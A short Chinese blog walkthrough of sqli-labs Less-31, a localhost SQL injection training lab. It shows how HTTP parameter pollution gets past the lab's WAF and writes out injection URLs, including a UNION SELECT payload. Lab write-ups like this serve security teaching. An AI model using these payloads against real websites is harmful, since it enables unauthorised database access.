sqli-labs (less-31)

其他 2021-03-22 08:52:00 阅读次数: 0

sqli-labs (less-31)

进入31，这里我们直接查看源文件

依然存在login.php文件

http://127.0.0.1/sql1/Less-31/login.php?id=1

http://127.0.0.1/sql1/Less-31/login.php?id=1'

WAF成功抵挡攻击

http://127.0.0.1/sql1/Less-31/login.php?id=1&id=2

http://127.0.0.1/sql1/Less-31/login.php?id=1&id=2' #回显正常
http://127.0.0.1/sql1/Less-31/login.php?id=1&id=2" #回显错误

根据错误信息判断闭合方式为")–+，并且为字符型注入

判断回显位置

http://127.0.0.1/sql1/Less-31/login.php?id=1&id=-2") union select 1,2,3--+

接下来的步骤与less-29一模一样，这里不具体介绍，具体过程请看我的less-29

猜你喜欢

转载自blog.csdn.net/kukudeshuo/article/details/114764885

sqli-labs (less-31)

Sqli-labs Less-31 HPP参数污染攻击

sqli-labs(31)

Sqli-Labs less29-31

sqli-labs ————less -10

sqli-labs ————less -16

sqli-labs ————less -7

sqli-labs ————less -9

sqli-labs ————less -8

Sqli-labs less 10

Sqli-labs less 9

Sqli-labs less 8

Sqli-labs less 7

Sqli-labs less 6

Sqli-labs less 5

#sqli-labs less 11

sqli-labs less -7

sqli-labs less 17

sqli-labs less 16

sqli-labs less 15

sqli-labs less 14

sqli-labs less 13

sqli-labs less 12

sqli-labs less 11

sqli-labs less 3

sqli-labs less 2

Sqli-Labs 闯关 less 26-31

sqli-labs————less6

sqli-labs—————Less-4

sqli-labs—————Less-3

今日推荐

周排行

(BIND最佳实践)Linux运维最佳实践

makefile ifeq之坑: 1. syntax error near unexpected token 2. *** missing separator. Stop.

easyui datagrid操作栏内置图片按钮

SQLyog连接MySQL时出现的2058错误解决方法

linux音频开发

hashcode方法简析

SpringBoot中使用Transaction注解遇到的坑

逆战-CSS中子元素在父元素中的4种水平垂直居中方法

Expression.Blend.4 Chapter 图片和视频的使用

springMVC返回void值

每日归档

更多

2024-09-17(0)

2024-09-16(0)

2024-09-15(0)

2024-09-14(0)

2024-09-13(0)

2024-09-12(0)

2024-09-11(0)

2024-09-10(0)

2024-09-09(0)

2024-09-08(0)